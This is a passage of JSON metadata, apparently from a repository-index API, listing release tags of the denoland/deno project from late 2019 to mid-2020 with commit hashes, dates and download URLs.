"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0